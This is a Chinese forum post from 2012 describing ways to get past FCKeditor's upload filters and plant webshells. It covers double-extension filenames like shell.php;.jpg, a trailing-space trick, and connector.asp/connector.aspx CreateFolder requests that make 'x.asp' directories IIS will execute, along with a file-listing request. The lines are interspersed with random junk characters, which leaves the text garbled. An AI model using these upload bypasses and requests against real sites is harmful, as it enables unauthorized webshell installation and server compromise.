很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg- g4 F: z5 O; x, h
V6 d$ u; Q! j' }2 l; J' q
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。0 u9 C! w7 I: H. {. \
& y. ^% L- ]; i0 q- _1 }8 C
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。! q7 d0 M4 f. n' {+ L7 t8 ^
, d4 P0 F2 P0 n0 ^; a; {9 y& K- o突破建立文件夹:6 p5 i/ C3 @3 U7 H( M; y0 `
% s% P* c& d- N6 u* @editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
) |8 S: q0 v0 h& l& R2 }3 R* N: L0 ~+ U! i6 W' \, a
参数:
1 C I5 ?" R9 b6 a6 }7 v& O' E3 d0 S: U6 Z# p( A {$ {
当前目录名:CurrentFolder=/qing.asp# O0 c C3 p% o7 X
+ [) b7 d$ b% ?6 h
新的目录名:NewFolderName=x.asp! v- b. M) ?1 T, O
+ | Z& D+ f/ L
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……% g3 @# D) c4 \: |
6 I9 z* P8 e+ C' ]% B$ K那么 x.asp 就已经建立生成了,此方法百试百灵!2 ?3 T" u% e3 j5 H
p8 _3 I# h# g- ^, f' {/ I9 W1 b新建文件夹参数 x.asp,基本都能搞定。
% w. A4 ~# I( g) S* N$ D |/ B8 `8 z9 o
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
! f* o+ ?$ Y/ h" b% o" `* r& T+ N" T; C ^9 Z& }3 Q/ M+ l5 {
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp B# g C; d7 |8 q/ K
5 B! `: r8 J- r5 {7 e2 |, Y& t获取文件列表
6 i' Q' D0 o6 F7 |2 C( K aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F0 z3 s4 P; M* ]$ P; [3 Q {% q
( g0 i$ f) ~. A# B: ~6 T |
发表于 2012-12-31 09:27:09
收藏
支持
反对